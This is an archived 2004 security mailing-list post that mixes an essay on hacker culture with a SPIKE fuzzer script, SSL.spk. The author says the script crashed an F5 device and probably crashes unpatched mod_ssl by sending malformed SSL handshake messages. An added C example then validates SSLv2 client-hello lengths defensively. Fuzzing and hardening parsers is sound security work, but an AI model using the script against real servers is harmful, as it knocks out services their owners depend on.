[Dailydave] A shard of glass left on the bathroom floor from a light that broke long ago
From: Dave Aitel (dave immunitysec.com)
Date: Wed Jan 14 2004 - 22:16:38 CST
Hackers have an oral history, but it's written down, fragmented into
mailing list posts and the headers of various exploits and tools, passed
from person to person like the precious artworks they are. A lot of
exploits are released to the public as punctuation - a way to say "Even
though I'm young enough to get carded, don't drive an Audi to work every
morning, don't know the difference between UML and a hole in the ground,
don't have a business plan, ten million of VC, three software patents
and my face on TV, I still can tell when you're full of it."
I once read a poem in a Virginia Tech magazine that ended with "Tell the
truth and it will be beautiful no matter what." In some way, I feel this
way with exploits. A good exploit is the unvarnished truth, and
beautiful in that regard.
But this little piece of code isn't meant to be beautiful. I'm posting
this just to say to all the hackers and "security professionals" trading
in their minds for their lives that there are still free voices out
there. That working like a slave so that you can buy a house in a Boston
suburb may be the easy path, but it's not the only path.
//SSL.spk - crashed an F5, probably crashes mod_ssl (unpatched). Useful
//for demonstrating that 20 minutes and a copy of SPIKE 2.9 is sometimes
//better than a truckload of government contractors.
s_binary("80"); //???
s_binary_block_size_byte_variable("Hello");
s_block_start("Hello");
s_binary("01"); //hello message
s_binary("03 01"); //version 0301
s_binary_block_size_halfword_bigendian_variable("cypher_spec_length");
s_binary_block_size_halfword_bigendian_variable("session_id_length");
s_binary_block_size_halfword_bigendian_variable("challenge_length");
s_block_start("cypher_spec_length");
s_binary("00000a");
s_string_variable("");
s_block_end("cypher_spec_length");
s_block_start("challenge_length");
s_string_variable("challengchallengchallengchalleng");
s_block_end("challenge_length");
s_block_end("Hello");
//NEXT PACKET
s_binary("22");
s_binary("0301");
s_binary_block_size_halfword_bigendian_variable("length2");
s_block_start("length2");
s_binary("10"); //client key exchange
s_binary("00"); //pad
s_binary_block_size_halfword_bigendian_variable("handshake_length");
s_block_start("handshake_length");
s_string_variable("keykkeyk");
s_block_end("handshake_length");
s_block_end("length2");
s_binary("14"); //change cypher
s_binary("0301");
s_binary_block_size_halfword_bigendian_variable("length3");
s_block_start("length3");
s_binary("01");
s_string_variable("");
s_block_end("length3");
s_binary("16"); //encrypted handshake method
s_binary("0301"); //version
s_binary_block_size_halfword_bigendian_variable("length4");
s_block_start("length4");
s_string_variable("hihihihihihihihi");
s_block_end("length4");
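
For whoever maintains the parser on the receiving end of the first message in the script above, an added example (not part of the original post and not SPIKE code) of validating the three declared lengths against the bytes actually received before any of them is used. The function, type and constant names are hypothetical, the field limits are those of the SSLv2 draft, and the sample message is constructed from the script's default values.

```c
#include <stddef.h>
#include <stdint.h>

/* Result codes for this added example (hypothetical names). */
enum hello_rc { HELLO_OK = 0, HELLO_SHORT, HELLO_BAD_HEADER, HELLO_BAD_TYPE,
                HELLO_BAD_LENGTH, HELLO_LENGTH_MISMATCH };

struct client_hello {
    uint16_t version;
    const uint8_t *cipher_specs, *session_id, *challenge;
    size_t cipher_len, session_len, challenge_len;
};

/* Constructed sample: the script's first message with its default strings. */
static const uint8_t SAMPLE_OK[] =
    "\x80\x2c\x01\x03\x01\x00\x03\x00\x00\x00\x20\x00\x00\x0a"
    "challengchallengchallengchalleng";

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Parse one SSLv2-framed CLIENT-HELLO from buf[0..len). Pointers in *out
 * alias buf and are only set after every length has been validated. */
enum hello_rc parse_v2_client_hello(const uint8_t *buf, size_t len,
                                    struct client_hello *out)
{
    if (len < 2) return HELLO_SHORT;
    if (!(buf[0] & 0x80)) return HELLO_BAD_HEADER;   /* 2-byte header form only */
    size_t rec_len = (size_t)((buf[0] & 0x7f) << 8) | buf[1];
    if (rec_len > len - 2) return HELLO_SHORT;       /* claims more than received */
    if (rec_len < 9) return HELLO_BAD_LENGTH;        /* type, version, 3 lengths */
    const uint8_t *p = buf + 2;
    if (p[0] != 0x01) return HELLO_BAD_TYPE;         /* 01 = client hello */
    size_t cs = be16(p + 3), sid = be16(p + 5), ch = be16(p + 7);
    if (cs == 0 || cs % 3 != 0) return HELLO_BAD_LENGTH;  /* 3-byte cipher specs */
    if (sid != 0 && sid != 16) return HELLO_BAD_LENGTH;
    if (ch < 16 || ch > 32) return HELLO_BAD_LENGTH;
    /* Each field is at most 65535, so the sum cannot wrap a size_t. */
    if (cs + sid + ch != rec_len - 9) return HELLO_LENGTH_MISMATCH;
    out->version = be16(p + 1);
    out->cipher_specs = p + 9;          out->cipher_len = cs;
    out->session_id = p + 9 + cs;       out->session_len = sid;
    out->challenge = p + 9 + cs + sid;  out->challenge_len = ch;
    return HELLO_OK;
}

int main(void) {
    struct client_hello h;
    return parse_v2_client_hello(SAMPLE_OK, sizeof SAMPLE_OK - 1, &h);
}
```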